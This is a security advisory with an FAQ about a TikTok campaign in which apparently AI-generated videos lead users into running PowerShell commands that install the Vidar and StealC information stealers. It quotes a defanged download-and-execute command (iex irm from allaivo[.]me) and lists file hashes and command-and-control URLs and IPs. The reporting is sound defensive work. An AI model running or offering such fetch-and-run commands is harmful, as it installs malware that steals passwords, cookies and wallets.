What happens when users follow the TikTok malware instructions?

When users execute the PowerShell commands, the malicious script creates hidden directories in the user's APPDATA and LOCALAPPDATA folders, adds these locations to Windows Defender's exclusion list to evade detection, retrieves either Vidar or StealC malware, and establishes persistence through registry modifications. The malware then communicates with command-and-control servers.

What information do the Vidar and StealC malware steal?

The Vidar and StealC information stealers typically target and exfiltrate sensitive information including stored passwords from web browsers, digital wallet information and cryptocurrency data, authentication cookies, autofill data, credit card information, email credentials, documents and personal files, and screenshots of the victim's desktop.

Which TikTok accounts were involved in this malware campaign?

Several TikTok accounts have been identified as part of this campaign, including accounts with usernames like gitallowed, zane.houghton, allaivo2, sysglow.wow, alexfixpc, and digitaldreams771, though these accounts are no longer active.

How do the attackers evade detection in this TikTok malware campaign?

The malware adds malicious file locations to Windows Defender's exclusion list to evade detection. The malware also communicates with command-and-control servers, some of which abuse legitimate platforms like Steam and Telegram to conceal their actual location.

What makes this TikTok malware campaign different from traditional phishing?

This attack moves away from traditional phishing email to malicious website-based attacks to fully exploiting social media platforms for malware delivery. It uses AI-generated videos on TikTok to provide step-by-step malicious instructions, representing a shift in how cybercriminals distribute malware.

How can users protect themselves from this TikTok malware scam?

Users should never execute PowerShell commands or download software from TikTok videos or other social media platforms. Legitimate software should only be obtained from official vendors and authorized distributors. Be suspicious of any 'free activation' or 'crack' instructions, as these are common tactics used by cybercriminals. Always use official software activation methods and avoid pirated software.

What should someone do if they think they've been affected by this TikTok malware?

If you suspect you've executed commands from suspicious TikTok videos, immediately run a full antivirus scan, change all passwords (especially for banking and important accounts), monitor financial accounts for suspicious activity, consider using a different device for sensitive activities until the infected device is cleaned, and contact cybersecurity professionals if needed.

Why are cybercriminals using TikTok for malware distribution?

TikTok provides a large, engaged audience and the video format allows for detailed step-by-step instructions that can appear legitimate. The platform's algorithm can help malicious content reach targeted users seeking free software. Additionally, users may be less suspicious of content on social media platforms compared to traditional phishing emails.

Scam/Phishing

Criminals use TikTok videos to promise pirated apps, scam users into loading malware

published: May 22, 2025

Take action: There is no such thing as free lunch! Nor a secret to a "free" commercial software. Don't EVER execute commands on your computer that you have found on social media - unless you know exactly what the command does. And even then check the command with a vendor site, and these days even ask your favorite AI. Because commands on videos are very possibly scams or installers to malware.

Learn More

Trend Research is reporting an active social engineering campaign using TikTok's platform to scam users into installing information-stealing malware. This attack moves away from traditional phishing email -> malicious website-based attacks to fully exploiting social media platforms for malware delivery.

The campaign targets users seeking free or pirated software, tricking them into executing malicious commands that ultimately install Vidar and StealC information stealers.

The attackers utilize what appear to be AI-generated videos posted on TikTok that provide step-by-step instructions for supposedly "free activation" of commercial software like Windows OS, Microsoft Office, CapCut, and Spotify.

The videos instruct viewers to execute PowerShell commands that download and run malicious scripts

Several TikTok accounts have been identified as part of this campaign, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771, though these accounts are no longer active.

Attack sequence:

When users execute the PowerShell command (for example) iex (irm hxxps://allaivo[.]me/spotify), it downloads and runs a script that creates hidden directories in the user's APPDATA and LOCALAPPDATA folders.
These locations are added to Windows Defender's exclusion list to evade detection.
The script then retrieves either Vidar or StealC malware from a secondary URL and establishes persistence through registry modifications.
The malware communicates with command-and-control servers, some of which abuse legitimate platforms like Steam and Telegram to conceal their actual location.
The Vidar and StealC information stealers typically target and exfiltrate sensitive information including
1. Stored passwords from web browsers
2. Digital wallet information and cryptocurrency data
3. Authentication cookies
4. Autofill data
5. Credit card information
6. Email credentials
7. Documents and personal files
8. Screenshots of the victim's desktop

Indicators of Compromise

The campaign utilizes multiple malicious components, including:

File Hashes:
- 3bb81c977bb34fadb3bdeac7e61193dd009725783fb2cf453e15ced70fc39e9b
- afc72f0d8f24657d0090566ebda910a3be89d4bdd68b029a99a19d146d63adc5
- b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886
Malicious URLs and IP Addresses:
- hxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php
- hxxps://allaivo[.]me/spotify
- hxxps://amssh[.]co/file[.]exe
- hxxps://amssh[.]co/script[.]ps1
- hxxps://steamcommunity[.]com/profiles/76561199846773220
- hxxps://t[.]me/v00rd
- hxxps://49[.]12[.]113[.]201
- hxxps://116[.]202[.]6[.]216

Criminals use TikTok videos to promise pirated apps, scam users into loading malware

Read More
Scam SMS messages offering Scam Recovery sent globally
Complex phishing campaign impersonating Macedonian Post, stealing personal …
The Fake Invoice That Bites Back: Multi-Stage Malware …
One more attampt at "you have a delivery" …
Checkpoint warns of phishing campaign that emulates potential …